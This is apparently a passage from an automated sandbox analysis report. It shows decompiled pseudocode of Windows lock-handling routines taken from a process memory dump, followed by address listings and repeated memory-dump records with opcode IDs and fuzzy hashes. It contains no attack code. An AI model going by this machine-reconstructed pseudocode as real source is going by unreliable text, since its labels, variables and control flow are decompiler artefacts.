                                                                                          										__eflags = 0;
                                                                                          										L49:
                                                                                          										E01B4FFB0(_t198, _t241, 0x1c28608);
                                                                                          										__eflags = _t253;
                                                                                          										if(_t253 != 0) {
                                                                                          											L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                                                          										}
                                                                                          										goto L31;
                                                                                          									}
                                                                                          									 *0x1c26e48 = _t241;
                                                                                          									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                                                          									__eflags = _t253;
                                                                                          									if(_t253 != 0) {
                                                                                          										_t57 = _t253 + 0x34;
                                                                                          										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                                                                          										__eflags =  *_t57;
                                                                                          										if( *_t57 == 0) {
                                                                                          											goto L49;
                                                                                          										}
                                                                                          									}
                                                                                          									goto L48;
                                                                                          								}
                                                                                          								L31:
                                                                                          								_t229 = _t241;
                                                                                          								goto L14;
                                                                                          							}
                                                                                          							_v73 = 1;
                                                                                          							_v64 = _t240;
                                                                                          							asm("lock bts dword [esi], 0x0");
                                                                                          							if(_t275 < 0) {
                                                                                          								_t231 =  *0x1c28608; // 0x0
                                                                                          								while(1) {
                                                                                          									_v60 = _t231;
                                                                                          									__eflags = _t231 & 0x00000001;
                                                                                          									if((_t231 & 0x00000001) != 0) {
                                                                                          										goto L76;
                                                                                          									}
                                                                                          									_t73 = _t231 + 1; // 0x1
                                                                                          									_t210 = _t73;
                                                                                          									asm("lock cmpxchg [edi], ecx");
                                                                                          									__eflags = _t231 - _t231;
                                                                                          									if(_t231 != _t231) {
                                                                                          										L92:
                                                                                          										_t133 = E01B66B90(_t210,  &_v64);
                                                                                          										_t262 =  *0x1c28608; // 0x0
                                                                                          										L93:
                                                                                          										_t231 = _t262;
                                                                                          										continue;
                                                                                          									}
                                                                                          									_t240 = _v56;
                                                                                          									goto L10;
                                                                                          									L76:
                                                                                          									_t169 = E01B6E180(_t133);
                                                                                          									__eflags = _t169;
                                                                                          									if(_t169 != 0) {
                                                                                          										_push(0xc000004b);
                                                                                          										_push(0xffffffff);
                                                                                          										E01B797C0();
                                                                                          										_t231 = _v68;
                                                                                          									}
                                                                                          									_v72 = 0;
                                                                                          									_v24 =  *( *[fs:0x18] + 0x24);
                                                                                          									_v16 = 3;
                                                                                          									_v28 = 0;
                                                                                          									__eflags = _t231 & 0x00000002;
                                                                                          									if((_t231 & 0x00000002) == 0) {
                                                                                          										_v32 =  &_v36;
                                                                                          										_t174 = _t231 >> 4;
                                                                                          										__eflags = 1 - _t174;
                                                                                          										_v20 = _t174;
                                                                                          										asm("sbb ecx, ecx");
                                                                                          										_t210 = 3 |  &_v36;
                                                                                          										__eflags = _t174;
                                                                                          										if(_t174 == 0) {
                                                                                          											_v20 = 0xfffffffe;
                                                                                          										}
                                                                                          									} else {
                                                                                          										_v32 = 0;
                                                                                          										_v20 = 0xffffffff;
                                                                                          										_v36 = _t231 & 0xfffffff0;
                                                                                          										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                                                          										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                                                          									}
                                                                                          									asm("lock cmpxchg [edi], esi");
                                                                                          									_t262 = _t231;
                                                                                          									__eflags = _t262 - _t231;
                                                                                          									if(_t262 != _t231) {
                                                                                          										goto L92;
                                                                                          									} else {
                                                                                          										__eflags = _v72;
                                                                                          										if(_v72 != 0) {
                                                                                          											E01B7006A(0x1c28608, _t210);
                                                                                          										}
                                                                                          										__eflags =  *0x7ffe036a - 1;
                                                                                          										if(__eflags <= 0) {
                                                                                          											L89:
                                                                                          											_t133 =  &_v16;
                                                                                          											asm("lock btr dword [eax], 0x1");
                                                                                          											if(__eflags >= 0) {
                                                                                          												goto L93;
                                                                                          											} else {
                                                                                          												goto L90;
                                                                                          											}
                                                                                          											do {
                                                                                          												L90:
                                                                                          												_push(0);
                                                                                          												_push(0x1c28608);
                                                                                          												E01B7B180();
                                                                                          												_t133 = _v24;
                                                                                          												__eflags = _t133 & 0x00000004;
                                                                                          											} while ((_t133 & 0x00000004) == 0);
                                                                                          											goto L93;
                                                                                          										} else {
                                                                                          											_t218 =  *0x1c26904; // 0x400
                                                                                          											__eflags = _t218;
                                                                                          											if(__eflags == 0) {
                                                                                          												goto L89;
                                                                                          											} else {
                                                                                          												goto L87;
                                                                                          											}
                                                                                          											while(1) {
                                                                                          												L87:
                                                                                          												__eflags = _v16 & 0x00000002;
                                                                                          												if(__eflags == 0) {
                                                                                          													goto L89;
                                                                                          												}
                                                                                          												asm("pause");
                                                                                          												_t218 = _t218 - 1;
                                                                                          												__eflags = _t218;
                                                                                          												if(__eflags != 0) {
                                                                                          													continue;
                                                                                          												}
                                                                                          												goto L89;
                                                                                          											}
                                                                                          											goto L89;
                                                                                          										}
                                                                                          									}
                                                                                          								}
                                                                                          							}
                                                                                          							L10:
                                                                                          							_t229 =  *0x1c26e48; // 0x0
                                                                                          							_v72 = _t229;
                                                                                          							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                                          								E01B4FFB0(_t198, _t240, 0x1c28608);
                                                                                          								_t253 = _v76;
                                                                                          								goto L29;
                                                                                          							} else {
                                                                                          								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                                                          								asm("lock cmpxchg [esi], ecx");
                                                                                          								_t215 = 1;
                                                                                          								if(1 != 1) {
                                                                                          									while(1) {
                                                                                          										_t246 = _t215 & 0x00000006;
                                                                                          										_t180 = _t215;
                                                                                          										__eflags = _t246 - 2;
                                                                                          										_v56 = _t246;
                                                                                          										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                                                          										asm("lock cmpxchg [edi], esi");
                                                                                          										_t248 = _v56;
                                                                                          										__eflags = _t180 - _t215;
                                                                                          										if(_t180 == _t215) {
                                                                                          											break;
                                                                                          										}
                                                                                          										_t215 = _t180;
                                                                                          									}
                                                                                          									__eflags = _t248 - 2;
                                                                                          									if(_t248 == 2) {
                                                                                          										__eflags = 0;
                                                                                          										E01B700C2(0x1c28608, 0, _t235);
                                                                                          									}
                                                                                          									_t229 = _v72;
                                                                                          								}
                                                                                          								goto L14;
                                                                                          							}
                                                                                          						}
                                                                                          					}
                                                                                          				}
                                                                                          				_t227 = 0;
                                                                                          				_v75 = 0;
                                                                                          				if(_t128 != 0) {
                                                                                          					goto L4;
                                                                                          				}
                                                                                          				goto L2;
                                                                                          			}











































































                                                                                          0x01ba5a85
                                                                                          0x01ba5a87
                                                                                          0x01ba5a87
                                                                                          0x01ba5a8c
                                                                                          0x01ba5a91
                                                                                          0x01ba5a97
                                                                                          0x01ba5a9f
                                                                                          0x01ba5aa0
                                                                                          0x01ba5aa1
                                                                                          0x01ba5aa6
                                                                                          0x01ba5aab
                                                                                          0x01ba5ab1
                                                                                          0x01ba5ab3
                                                                                          0x01ba5ab9
                                                                                          0x01ba5aca
                                                                                          0x01ba5ad4
                                                                                          0x01ba5ad4
                                                                                          0x01ba5ade
                                                                                          0x01ba5ade
                                                                                          0x01ba5aab
                                                                                          0x01ba5a79
                                                                                          0x01ba5a52
                                                                                          0x01b621f7
                                                                                          0x01b621f9
                                                                                          0x01b621fe
                                                                                          0x01b621fe
                                                                                          0x01b621e3
                                                                                          0x01b62195
                                                                                          0x01b6236c
                                                                                          0x01b62122
                                                                                          0x01b62122
                                                                                          0x01b62124
                                                                                          0x01b62231
                                                                                          0x01b62236
                                                                                          0x01b62236
                                                                                          0x01b62238
                                                                                          0x01b62238
                                                                                          0x01b62240
                                                                                          0x01b62242
                                                                                          0x01b62244
                                                                                          0x01ba59fc
                                                                                          0x01b6218c
                                                                                          0x01b6218c
                                                                                          0x00000000
                                                                                          0x01b6218c
                                                                                          0x01b6224a
                                                                                          0x01b6224f
                                                                                          0x01b62256
                                                                                          0x01b62304
                                                                                          0x01b62309
                                                                                          0x01b6230f
                                                                                          0x01b6231e
                                                                                          0x01b6231e
                                                                                          0x01b6231e
                                                                                          0x01b62320
                                                                                          0x01b62325
                                                                                          0x01b6232a
                                                                                          0x01b6232c
                                                                                          0x01b6233e
                                                                                          0x01b6233e
                                                                                          0x00000000
                                                                                          0x01b6232c
                                                                                          0x01b62311
                                                                                          0x01b62317
                                                                                          0x01b6231a
                                                                                          0x01b6231c
                                                                                          0x01b62380
                                                                                          0x01b62380
                                                                                          0x01b62380
                                                                                          0x01b62384
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01b62386
                                                                                          0x00000000
                                                                                          0x01b6231c
                                                                                          0x01b6225c
                                                                                          0x01b6225c
                                                                                          0x00000000
                                                                                          0x01b6225c
                                                                                          0x01b6212a
                                                                                          0x01b62134
                                                                                          0x01b62138
                                                                                          0x01b6213d
                                                                                          0x01ba5858
                                                                                          0x01ba5863
                                                                                          0x01ba5863
                                                                                          0x01ba5867
                                                                                          0x01ba586a
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01ba586c
                                                                                          0x01ba586c
                                                                                          0x01ba5871
                                                                                          0x01ba5875
                                                                                          0x01ba5877
                                                                                          0x01ba5997
                                                                                          0x01ba599c
                                                                                          0x01ba59a1
                                                                                          0x01ba59a7
                                                                                          0x01ba59a7
                                                                                          0x00000000
                                                                                          0x01ba59a7
                                                                                          0x01ba587d
                                                                                          0x00000000
                                                                                          0x01ba588b
                                                                                          0x01ba588b
                                                                                          0x01ba5890
                                                                                          0x01ba5892
                                                                                          0x01ba5894
                                                                                          0x01ba5899
                                                                                          0x01ba589b
                                                                                          0x01ba58a0
                                                                                          0x01ba58a0
                                                                                          0x01ba58aa
                                                                                          0x01ba58b2
                                                                                          0x01ba58b6
                                                                                          0x01ba58be
                                                                                          0x01ba58c6
                                                                                          0x01ba58c9
                                                                                          0x01ba590d
                                                                                          0x01ba5917
                                                                                          0x01ba591a
                                                                                          0x01ba591c
                                                                                          0x01ba5920
                                                                                          0x01ba5928
                                                                                          0x01ba592a
                                                                                          0x01ba592c
                                                                                          0x01ba592e
                                                                                          0x01ba592e
                                                                                          0x01ba58cb
                                                                                          0x01ba58cd
                                                                                          0x01ba58d8
                                                                                          0x01ba58e0
                                                                                          0x01ba58f4
                                                                                          0x01ba58fe
                                                                                          0x01ba58fe
                                                                                          0x01ba593a
                                                                                          0x01ba593e
                                                                                          0x01ba5940
                                                                                          0x01ba5942
                                                                                          0x00000000
                                                                                          0x01ba5944
                                                                                          0x01ba5944
                                                                                          0x01ba5949
                                                                                          0x01ba594e
                                                                                          0x01ba594e
                                                                                          0x01ba5953
                                                                                          0x01ba595b
                                                                                          0x01ba5976
                                                                                          0x01ba5976
                                                                                          0x01ba597a
                                                                                          0x01ba597f
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01ba5981
                                                                                          0x01ba5981
                                                                                          0x01ba5981
                                                                                          0x01ba5983
                                                                                          0x01ba5988
                                                                                          0x01ba598d
                                                                                          0x01ba5991
                                                                                          0x01ba5991
                                                                                          0x00000000
                                                                                          0x01ba595d
                                                                                          0x01ba595d
                                                                                          0x01ba5963
                                                                                          0x01ba5965
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01ba5967
                                                                                          0x01ba5967
                                                                                          0x01ba596b
                                                                                          0x01ba596d
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01ba596f
                                                                                          0x01ba5971
                                                                                          0x01ba5971
                                                                                          0x01ba5974
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01ba5974
                                                                                          0x00000000
                                                                                          0x01ba5967
                                                                                          0x01ba595b
                                                                                          0x01ba5942
                                                                                          0x01ba5863
                                                                                          0x01b62143
                                                                                          0x01b62143
                                                                                          0x01b62149
                                                                                          0x01b6214f
                                                                                          0x01b622f1
                                                                                          0x01b622f6
                                                                                          0x00000000
                                                                                          0x01b62173
                                                                                          0x01b62173
                                                                                          0x01b6217d
                                                                                          0x01b62181
                                                                                          0x01b62186
                                                                                          0x01ba59ae
                                                                                          0x01ba59b2
                                                                                          0x01ba59b5
                                                                                          0x01ba59b7
                                                                                          0x01ba59ba
                                                                                          0x01ba59cd
                                                                                          0x01ba59d1
                                                                                          0x01ba59d5
                                                                                          0x01ba59d9
                                                                                          0x01ba59db
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01ba59dd
                                                                                          0x01ba59dd
                                                                                          0x01ba59e1
                                                                                          0x01ba59e4
                                                                                          0x01ba59e7
                                                                                          0x01ba59ee
                                                                                          0x01ba59ee
                                                                                          0x01ba59f3
                                                                                          0x01ba59f3
                                                                                          0x00000000
                                                                                          0x01b62186
                                                                                          0x01b6214f
                                                                                          0x01b62106
                                                                                          0x01b62266
                                                                                          0x01b620d8
                                                                                          0x01b620da
                                                                                          0x01b620e0
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 589e55172e6d7b4f1e65c7f6516adb931e5c3bae9efb8c315db83ae4bfa2c9e3
                                                                                          • Instruction ID: c5162572b14f2f542c451ff6917326fd859270160082eed972fe60c9e2991ead
                                                                                          • Opcode Fuzzy Hash: 589e55172e6d7b4f1e65c7f6516adb931e5c3bae9efb8c315db83ae4bfa2c9e3
                                                                                          • Instruction Fuzzy Hash: B1F1D1716083419FEB3ECF2CC44076A7BE9EBA5324F0486DDE9959B281D738D941CB92
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4c80d6e0370a266854846c049846799c660ba5bf9fdf440515b361e3d8b819a7
                                                                                          • Instruction ID: 6bcf1416126a2331580a98ab44deec1e2ff0d0c959a08d430ba081bf2a2ce22c
                                                                                          • Opcode Fuzzy Hash: 4c80d6e0370a266854846c049846799c660ba5bf9fdf440515b361e3d8b819a7
                                                                                          • Instruction Fuzzy Hash: AAE1B030A0135ACFEF39CF58C984B69B7B2FF65304F0482E9E90997291D7349981DB51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bd2625887cda8cbba97de2f1c41eb58b15a1cad06b91816563a88d513b7b8611
                                                                                          • Instruction ID: cad39f9463c84c72c7f53bb935d72875a58ae064a84856890c114c270626fa20
                                                                                          • Opcode Fuzzy Hash: bd2625887cda8cbba97de2f1c41eb58b15a1cad06b91816563a88d513b7b8611
                                                                                          • Instruction Fuzzy Hash: A6B16C70E00209DFDF29DFE9C984AADBBB9FF58304F1081ADE505AB245DB74A941DB90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 550167d582bd8cba684b946eb730b4f40fc4d74cdd6948464a66fe4c45f9f3aa
                                                                                          • Instruction ID: a0b0131e0b593abdd22b90c3a1fac2a53dd3b42ccb9e51872020d63663056e9d
                                                                                          • Opcode Fuzzy Hash: 550167d582bd8cba684b946eb730b4f40fc4d74cdd6948464a66fe4c45f9f3aa
                                                                                          • Instruction Fuzzy Hash: B2416AB5A04205DFCF18CF68C490BA9BBF5FBA9714F1481A9E905EB344C778A941CB50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                          • Instruction ID: 029f172fc00fa052b8922c328947dde234a6bed71a96d5f0a76f1db8e23f4e44
                                                                                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                          • Instruction Fuzzy Hash: 15314871A01647AFDB4DEBB8C480BE9FB59FF62244F0482DAC91C47201DB355A05DBE1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 39917adb3cf5e3de847b28bd744c8f51caad8fcdcda803dc96c40ffa43ff6b6d
                                                                                          • Instruction ID: 159bbb44485d7d684bc9443b3b0a3c1465205b9fb2de124189ca2b191dc860bb
                                                                                          • Opcode Fuzzy Hash: 39917adb3cf5e3de847b28bd744c8f51caad8fcdcda803dc96c40ffa43ff6b6d
                                                                                          • Instruction Fuzzy Hash: 2F31C4726047519FC728DF28C981ABAB7F5FFC8700F044A69F99587A90EB70E904C7A5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 94c5e87044647dac366f9626096a722d800457f7370e8441f91aa41a16ce32c9
                                                                                          • Instruction ID: dec7f346a14be2c47037b94529dc6e1e710b017fac6562f7df202bd248722112
                                                                                          • Opcode Fuzzy Hash: 94c5e87044647dac366f9626096a722d800457f7370e8441f91aa41a16ce32c9
                                                                                          • Instruction Fuzzy Hash: EA318A71609312DFCB28DF18D58596ABBE1FF85610F0489AEF8899B265D730DD04CBE2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a717d19b6a50da232022aa59c981d40664da168877ccd05c8a18f9bf22df4f94
                                                                                          • Instruction ID: e35f74c79c5111d0d493fc8b8c51b37fb0f921df7f5418f227db5f4a2f042a67
                                                                                          • Opcode Fuzzy Hash: a717d19b6a50da232022aa59c981d40664da168877ccd05c8a18f9bf22df4f94
                                                                                          • Instruction Fuzzy Hash: 1B318BB1620301DBDB39CF2CD8C0F257BF9EBB5610F1409AAE216A7A44D778D901CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 835bfd3d18fc612c22aaeb9f4575ddd5dcada776cb0017071eaedb654e2b25e4
                                                                                          • Instruction ID: 1852b720f83608d5ec2df0150bdcd59c64999c743fba85da824ab44393e1802b
                                                                                          • Opcode Fuzzy Hash: 835bfd3d18fc612c22aaeb9f4575ddd5dcada776cb0017071eaedb654e2b25e4
                                                                                          • Instruction Fuzzy Hash: 34316B71609301CFE728CF1DC900B26BBE8FB98B00F4549ADF99897251EBB5D844CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 46ff24971fa384741a071861e82259b00ccf33d7349fbd747d35261f28dd92d6
                                                                                          • Instruction ID: 3e6647f6bcddfa5e20d788f6ed3e6b0ca386d538f54a91a6177d10197b53b617
                                                                                          • Opcode Fuzzy Hash: 46ff24971fa384741a071861e82259b00ccf33d7349fbd747d35261f28dd92d6
                                                                                          • Instruction Fuzzy Hash: 4131D972A00119EBCF19DF64CE81A7FB7B9EF54700F5140A9F901D7250EB749912DBA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a46c03a00c1bfc635c0b6c5a94bb00d0aff51b11ea2fb460aa5de81c3a5edd95
                                                                                          • Instruction ID: e3d4bb862905f8ea43716ffe85b8ef826ec389a2f22d1dffac0def45901e04d6
                                                                                          • Opcode Fuzzy Hash: a46c03a00c1bfc635c0b6c5a94bb00d0aff51b11ea2fb460aa5de81c3a5edd95
                                                                                          • Instruction Fuzzy Hash: BD31F132206751DFCB3AEF58C984B2ABBE4FF90B11F4445ADE9664B251CB70D800CB86
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 40211b15638a7d500c655a43470f5f091dbe68d3037cd4685699b07408534930
                                                                                          • Instruction ID: cc6718890d61839b7659464e674469cc75e9de4a5c55a81008f673ff5aeec258
                                                                                          • Opcode Fuzzy Hash: 40211b15638a7d500c655a43470f5f091dbe68d3037cd4685699b07408534930
                                                                                          • Instruction Fuzzy Hash: FD4180B1D002189FDB24DFAAD981AEEFBF4FB48710F5041AEE519A7640E7749A84CF50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 31dc9a5683ad940e45ab6b2d7bce164a88f56e19fe4d5d2547b63af5107ff57c
                                                                                          • Instruction ID: d658058836a722d7a713698d903affe5811c74007550636a9b425969210c8fee
                                                                                          • Opcode Fuzzy Hash: 31dc9a5683ad940e45ab6b2d7bce164a88f56e19fe4d5d2547b63af5107ff57c
                                                                                          • Instruction Fuzzy Hash: CE318C79A14249EFD748CF58D841B9ABBE8FB18214F1482A6F904CB341E735E880CBA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b69e2039570bc4179308eec4f022aaabcb74d0d83607c0923fec5f270622b5b6
                                                                                          • Instruction ID: 117d84d69f12cbf40325903d342f969cc6b3cc363f4bbb2f158fde7057a2ab73
                                                                                          • Opcode Fuzzy Hash: b69e2039570bc4179308eec4f022aaabcb74d0d83607c0923fec5f270622b5b6
                                                                                          • Instruction Fuzzy Hash: 16310132610666DBCB25DF98C5807A677B8FB38310F1401B8EE45DF206EB38DA458BA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 96b63f8e6489843e880e2d584d5b7aa87e8bbc60f222ea2d621f1b0b4527c15a
                                                                                          • Instruction ID: f7d3233c6ac3d246f72abd847945a50c5e356691b436d9ca95fd9f6e3acfc0c1
                                                                                          • Opcode Fuzzy Hash: 96b63f8e6489843e880e2d584d5b7aa87e8bbc60f222ea2d621f1b0b4527c15a
                                                                                          • Instruction Fuzzy Hash: 1531A071A01A45EFDB2ADF6DC488BACBBF1FB98318F148299C40577291C3B4A990CB51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                          • Instruction ID: 7b4a21cf7095c971d971b2a12d43855067d0308b3142dafea395f2b5c433d9e3
                                                                                          • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                          • Instruction Fuzzy Hash: D1217C72640119EBDB29CF9DDC80FAABBBDEF95641F114095EA0597220D738EE11CBA0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d94d2b5733cc98bb68a69e188112bd8640f5b7281da519208c51e4699afe929f
                                                                                          • Instruction ID: 3eaeaaf521ce42855a7f0085a5bc804f46613ddf301d3bdec07229fea1864a18
                                                                                          • Opcode Fuzzy Hash: d94d2b5733cc98bb68a69e188112bd8640f5b7281da519208c51e4699afe929f
                                                                                          • Instruction Fuzzy Hash: FD318F31601B04CFDB6ADF28C840B56B7E5FF89714F1845ADE99687A90EB35A801CB90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3fb4312dd4c4c8da38aa4052aef40d66de1af51fab2af4dba177520900f94f6
                                                                                          • Instruction ID: 9e161be65946f840af8e7fb181b2aeb39cde7ce85e4445928f036da3f8d5e212
                                                                                          • Opcode Fuzzy Hash: a3fb4312dd4c4c8da38aa4052aef40d66de1af51fab2af4dba177520900f94f6
                                                                                          • Instruction Fuzzy Hash: BD219CB1A00645AFDB19DB68D880F6AB7B8FF48700F1400A9F905C7B91DB34ED10CBA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                          • Instruction ID: 1a7d5bb0d9258e4216a28ca4f178d5f2785458069cec442033a2815ad640e3be
                                                                                          • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                          • Instruction Fuzzy Hash: 6A21CF71A00205EFDB25DF59D884EAAFBF8EB54324F1488AEE959A7610D370ED10CB90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7f3108506fd03ee37c7289cedb7c518f9dd37d7c7bd4c3a85bf7fcbd5bd506b5
                                                                                          • Instruction ID: 606ad9d5a31fc53065afc5094e6fed24a1995961c1cac96fa178b8510ada58e3
                                                                                          • Opcode Fuzzy Hash: 7f3108506fd03ee37c7289cedb7c518f9dd37d7c7bd4c3a85bf7fcbd5bd506b5
                                                                                          • Instruction Fuzzy Hash: B5219272600209AFDB14DF58DD81B5ABBBDFB54708F1500A8E909AB251D775ED01CB90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cd28c741282c0047bbb54a89c8d3db011100b5c399455481d7d09c4a4c9210f7
